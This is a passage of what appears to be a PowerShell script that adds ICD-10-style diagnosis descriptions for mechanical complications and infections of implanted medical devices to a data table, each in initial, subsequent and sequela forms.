(mechanical) of other implanted electronic stimulator of nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other implanted electronic stimulator of nervous system","Breakdown (mechanical) of other implanted electronic stimulator of nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other implanted electronic stimulator of nervous system","Breakdown (mechanical) of other implanted electronic stimulator of nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of brain electrode (lead)","Displacement of implanted electronic neurostimulator of brain electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of brain electrode (lead)","Displacement of implanted electronic neurostimulator of brain electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of brain electrode (lead)","Displacement of implanted electronic neurostimulator of brain electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Displacement of implanted electronic neurostimulator of peripheral nerve electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Displacement of implanted electronic neurostimulator of peripheral nerve electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Displacement of implanted electronic neurostimulator of peripheral nerve electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of spinal cord electrode (lead)","Displacement of implanted electronic neurostimulator of spinal cord electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of spinal cord electrode (lead)","Displacement of implanted electronic neurostimulator of spinal cord electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator of spinal cord electrode (lead)","Displacement of implanted electronic neurostimulator of spinal cord electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator, generator","Displacement of implanted electronic neurostimulator, generator, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator, generator","Displacement of implanted electronic neurostimulator, generator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted electronic neurostimulator, generator","Displacement of implanted electronic neurostimulator, generator, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other implanted electronic stimulator of nervous system","Displacement of other implanted electronic stimulator of nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other implanted electronic stimulator of nervous system","Displacement of other implanted electronic stimulator of nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other implanted electronic stimulator of nervous system","Displacement of other implanted electronic stimulator of nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of brain electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of brain electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of brain electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of brain electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of brain electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of brain electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of peripheral nerve electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of peripheral nerve electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of peripheral nerve electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of spinal cord electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of spinal cord electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of spinal cord electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of spinal cord electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator of spinal cord electrode (lead)","Other mechanical complication of implanted electronic neurostimulator of spinal cord electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator, generator","Other mechanical complication of implanted electronic neurostimulator, generator, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator, generator","Other mechanical complication of implanted electronic neurostimulator, generator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted electronic neurostimulator, generator","Other mechanical complication of implanted electronic neurostimulator, generator, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other implanted electronic stimulator of nervous system","Other mechanical complication of other implanted electronic stimulator of nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other implanted electronic stimulator of nervous system","Other mechanical complication of other implanted electronic stimulator of nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other implanted electronic stimulator of nervous system","Other mechanical complication of other implanted electronic stimulator of nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intraocular lens","Breakdown (mechanical) of intraocular lens, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intraocular lens","Breakdown (mechanical) of intraocular lens, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intraocular lens","Breakdown (mechanical) of intraocular lens, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of intraocular lens","Displacement of intraocular lens, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of intraocular lens","Displacement of intraocular lens, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of intraocular lens","Displacement of intraocular lens, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intraocular lens","Other mechanical complication of intraocular lens, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intraocular lens","Other mechanical complication of intraocular lens, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intraocular lens","Other mechanical complication of intraocular lens, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of prosthetic orbit of right eye","Breakdown (mechanical) of prosthetic orbit of right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of prosthetic orbit of right eye","Breakdown (mechanical) of prosthetic orbit of right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of prosthetic orbit of right eye","Breakdown (mechanical) of prosthetic orbit of right eye, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of prosthetic orbit of left eye","Breakdown (mechanical) of prosthetic orbit of left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of prosthetic orbit of left eye","Breakdown (mechanical) of prosthetic orbit of left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of prosthetic orbit of left eye","Breakdown (mechanical) of prosthetic orbit of left eye, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other ocular prosthetic devices, implants and grafts","Breakdown (mechanical) of other ocular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other ocular prosthetic devices, implants and grafts","Breakdown (mechanical) of other ocular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other ocular prosthetic devices, implants and grafts","Breakdown (mechanical) of other ocular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of prosthetic orbit of right eye","Displacement of prosthetic orbit of right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of prosthetic orbit of right eye","Displacement of prosthetic orbit of right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of prosthetic orbit of right eye","Displacement of prosthetic orbit of right eye, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of prosthetic orbit of left eye","Displacement of prosthetic orbit of left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of prosthetic orbit of left eye","Displacement of prosthetic orbit of left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of prosthetic orbit of left eye","Displacement of prosthetic orbit of left eye, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other ocular prosthetic devices, implants and grafts","Displacement of other ocular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other ocular prosthetic devices, implants and grafts","Displacement of other ocular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other ocular prosthetic devices, implants and grafts","Displacement of other ocular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of prosthetic orbit of right eye","Other mechanical complication of prosthetic orbit of right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of prosthetic orbit of right eye","Other mechanical complication of prosthetic orbit of right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of prosthetic orbit of right eye","Other mechanical complication of prosthetic orbit of right eye, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of prosthetic orbit of left eye","Other mechanical complication of prosthetic orbit of left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of prosthetic orbit of left eye","Other mechanical complication of prosthetic orbit of left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of prosthetic orbit of left eye","Other mechanical complication of prosthetic orbit of left eye, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other ocular prosthetic devices, implants and grafts","Other mechanical complication of other ocular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other ocular prosthetic devices, implants and grafts","Other mechanical complication of other ocular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other ocular prosthetic devices, implants and grafts","Other mechanical complication of other ocular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of breast prosthesis and implant","Breakdown (mechanical) of breast prosthesis and implant, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of breast prosthesis and implant","Breakdown (mechanical) of breast prosthesis and implant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of breast prosthesis and implant","Breakdown (mechanical) of breast prosthesis and implant, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of breast prosthesis and implant","Displacement of breast prosthesis and implant, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of breast prosthesis and implant","Displacement of breast prosthesis and implant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of breast prosthesis and implant","Displacement of breast prosthesis and implant, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of breast prosthesis and implant","Leakage of breast prosthesis and implant, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of breast prosthesis and implant","Leakage of breast prosthesis and implant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of breast prosthesis and implant","Leakage of breast prosthesis and implant, sequela") + $null = $DiagnosisList.Rows.Add("Capsular contracture of breast implant","Capsular contracture of breast implant, initial encounter") + $null = $DiagnosisList.Rows.Add("Capsular contracture of breast implant","Capsular contracture of breast implant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Capsular contracture of breast implant","Capsular contracture of breast implant, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of breast prosthesis and implant","Other mechanical complication of breast prosthesis and implant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of breast prosthesis and implant","Other mechanical complication of breast prosthesis and implant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of breast prosthesis and implant","Other mechanical complication of breast prosthesis and implant, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of bile duct prosthesis","Breakdown (mechanical) of bile duct prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of bile duct prosthesis","Breakdown (mechanical) of bile duct prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of bile duct prosthesis","Breakdown (mechanical) of bile duct prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of esophageal anti-reflux device","Breakdown (mechanical) of esophageal anti-reflux device, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of esophageal anti-reflux device","Breakdown (mechanical) of esophageal anti-reflux device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of esophageal anti-reflux device","Breakdown (mechanical) of esophageal anti-reflux device, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other gastrointestinal prosthetic devices, implants and grafts","Breakdown (mechanical) of other gastrointestinal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other gastrointestinal prosthetic devices, implants and grafts","Breakdown (mechanical) of other gastrointestinal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other gastrointestinal prosthetic devices, implants and grafts","Breakdown (mechanical) of other gastrointestinal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of bile duct prosthesis","Displacement of bile duct prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of bile duct prosthesis","Displacement of bile duct prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of bile duct prosthesis","Displacement of bile duct prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of esophageal anti-reflux device","Displacement of esophageal anti-reflux device, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of esophageal anti-reflux device","Displacement of esophageal anti-reflux device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of esophageal anti-reflux device","Displacement of esophageal anti-reflux device, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other gastrointestinal prosthetic devices, implants and grafts","Displacement of other gastrointestinal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other gastrointestinal prosthetic devices, implants and grafts","Displacement of other gastrointestinal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other gastrointestinal prosthetic devices, implants and grafts","Displacement of other gastrointestinal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of bile duct prosthesis","Other mechanical complication of bile duct prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of bile duct prosthesis","Other mechanical complication of bile duct prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of bile duct prosthesis","Other mechanical complication of bile duct prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of esophageal anti-reflux device","Other mechanical complication of esophageal anti-reflux device, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of esophageal anti-reflux device","Other mechanical complication of esophageal anti-reflux device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of esophageal anti-reflux device","Other mechanical complication of esophageal anti-reflux device, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other gastrointestinal prosthetic devices, implants and grafts","Other mechanical complication of other gastrointestinal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other gastrointestinal prosthetic devices, implants and grafts","Other mechanical complication of other gastrointestinal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other gastrointestinal prosthetic devices, implants and grafts","Other mechanical complication of other gastrointestinal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cranial or spinal infusion catheter","Breakdown (mechanical) of cranial or spinal infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cranial or spinal infusion catheter","Breakdown (mechanical) of cranial or spinal infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cranial or spinal infusion catheter","Breakdown (mechanical) of cranial or spinal infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intraperitoneal dialysis catheter","Breakdown (mechanical) of intraperitoneal dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intraperitoneal dialysis catheter","Breakdown (mechanical) of intraperitoneal dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intraperitoneal dialysis catheter","Breakdown (mechanical) of intraperitoneal dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of permanent sutures","Breakdown (mechanical) of permanent sutures, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of permanent sutures","Breakdown (mechanical) of permanent sutures, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of permanent sutures","Breakdown (mechanical) of permanent sutures, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of artificial skin graft and decellularized allodermis","Breakdown (mechanical) of artificial skin graft and decellularized allodermis, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of artificial skin graft and decellularized allodermis","Breakdown (mechanical) of artificial skin graft and decellularized allodermis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of artificial skin graft and decellularized allodermis","Breakdown (mechanical) of artificial skin graft and decellularized allodermis, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of insulin pump","Breakdown (mechanical) of insulin pump, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of insulin pump","Breakdown (mechanical) of insulin pump, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of insulin pump","Breakdown (mechanical) of insulin pump, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other nervous system device, implant or graft","Breakdown (mechanical) of other nervous system device, implant or graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other nervous system device, implant or graft","Breakdown (mechanical) of other nervous system device, implant or graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other nervous system device, implant or graft","Breakdown (mechanical) of other nervous system device, implant or graft, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other specified internal prosthetic devices, implants and grafts","Breakdown (mechanical) of other specified internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other specified internal prosthetic devices, implants and grafts","Breakdown (mechanical) of other specified internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other specified internal prosthetic devices, implants and grafts","Breakdown (mechanical) of other specified internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of cranial or spinal infusion catheter","Displacement of cranial or spinal infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cranial or spinal infusion catheter","Displacement of cranial or spinal infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cranial or spinal infusion catheter","Displacement of cranial or spinal infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of intraperitoneal dialysis catheter","Displacement of intraperitoneal dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of intraperitoneal dialysis catheter","Displacement of intraperitoneal dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of intraperitoneal dialysis catheter","Displacement of intraperitoneal dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of permanent sutures","Displacement of permanent sutures, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of permanent sutures","Displacement of permanent sutures, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of permanent sutures","Displacement of permanent sutures, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of artificial skin graft and decellularized allodermis","Displacement of artificial skin graft and decellularized allodermis, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of artificial skin graft and decellularized allodermis","Displacement of artificial skin graft and decellularized allodermis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of artificial skin graft and decellularized allodermis","Displacement of artificial skin graft and decellularized allodermis, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of insulin pump","Displacement of insulin pump, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of insulin pump","Displacement of insulin pump, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of insulin pump","Displacement of insulin pump, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other nervous system device, implant or graft","Displacement of other nervous system device, implant or graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other nervous system device, implant or graft","Displacement of other nervous system device, implant or graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other nervous system device, implant or graft","Displacement of other nervous system device, implant or graft, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other specified internal prosthetic devices, implants and grafts","Displacement of other specified internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other specified internal prosthetic devices, implants and grafts","Displacement of other specified internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other specified internal prosthetic devices, implants and grafts","Displacement of other specified internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of cranial or spinal infusion catheter","Leakage of cranial or spinal infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of cranial or spinal infusion catheter","Leakage of cranial or spinal infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of cranial or spinal infusion catheter","Leakage of cranial or spinal infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of intraperitoneal dialysis catheter","Leakage of intraperitoneal dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of intraperitoneal dialysis catheter","Leakage of intraperitoneal dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of intraperitoneal dialysis catheter","Leakage of intraperitoneal dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of insulin pump","Leakage of insulin pump, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of insulin pump","Leakage of insulin pump, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of insulin pump","Leakage of insulin pump, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of other nervous system device, implant or graft","Leakage of other nervous system device, implant or graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other nervous system device, implant or graft","Leakage of other nervous system device, implant or graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other nervous system device, implant or graft","Leakage of other nervous system device, implant or graft, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of other specified internal prosthetic devices, implants and grafts","Leakage of other specified internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other specified internal prosthetic devices, implants and grafts","Leakage of other specified internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other specified internal prosthetic devices, implants and grafts","Leakage of other specified internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cranial or spinal infusion catheter","Other mechanical complication of cranial or spinal infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cranial or spinal infusion catheter","Other mechanical complication of cranial or spinal infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cranial or spinal infusion catheter","Other mechanical complication of cranial or spinal infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intraperitoneal dialysis catheter","Other mechanical complication of intraperitoneal dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intraperitoneal dialysis catheter","Other mechanical complication of intraperitoneal dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intraperitoneal dialysis catheter","Other mechanical complication of intraperitoneal dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of permanent sutures","Other mechanical complication of permanent sutures, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of permanent sutures","Other mechanical complication of permanent sutures, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of permanent sutures","Other mechanical complication of permanent sutures, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of artificial skin graft and decellularized allodermis","Other mechanical complication of artificial skin graft and decellularized allodermis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of artificial skin graft and decellularized allodermis","Other mechanical complication of artificial skin graft and decellularized allodermis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of artificial skin graft and decellularized allodermis","Other mechanical complication of artificial skin graft and decellularized allodermis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of insulin pump","Other mechanical complication of insulin pump, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of insulin pump","Other mechanical complication of insulin pump, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of insulin pump","Other mechanical complication of insulin pump, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other nervous system device, implant or graft","Other mechanical complication of other nervous system device, implant or graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other nervous system device, implant or graft","Other mechanical complication of other nervous system device, implant or graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other nervous system device, implant or graft","Other mechanical complication of other nervous system device, implant or graft, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other specified internal prosthetic devices, implants and grafts","Other mechanical complication of other specified internal prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other specified internal prosthetic devices, implants and grafts","Other mechanical complication of other specified internal prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other specified internal prosthetic devices, implants and grafts","Other mechanical complication of other specified internal prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to peritoneal dialysis catheter","Infection and inflammatory reaction due to peritoneal dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to peritoneal dialysis catheter","Infection and inflammatory reaction due to peritoneal dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to peritoneal dialysis catheter","Infection and inflammatory reaction due to peritoneal dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to insulin pump","Infection and inflammatory reaction due to insulin pump, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to insulin pump","Infection and inflammatory reaction due to insulin pump, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to insulin pump","Infection and inflammatory reaction due to insulin pump, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to ventricular intracranial (communicating) shunt","Infection and inflammatory reaction due to ventricular intracranial (communicating) shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to ventricular intracranial (communicating) shunt","Infection and inflammatory reaction due to ventricular intracranial (communicating) shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to ventricular intracranial (communicating) shunt","Infection and inflammatory reaction due to ventricular intracranial (communicating) shunt, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of brain, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of brain, electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of brain, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of brain, electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of brain, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of brain, electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of peripheral nerve, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of peripheral nerve, electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of peripheral nerve, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of peripheral nerve, electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of peripheral nerve, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of peripheral nerve, electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of spinal cord, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of spinal cord, electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted electronic neurostimulator of spinal cord, electrode (lead)","Infection and inflammatory reaction due to implanted electronic neurostimulator of spinal cord, electrode (lead), subsequent encounter") + $null = 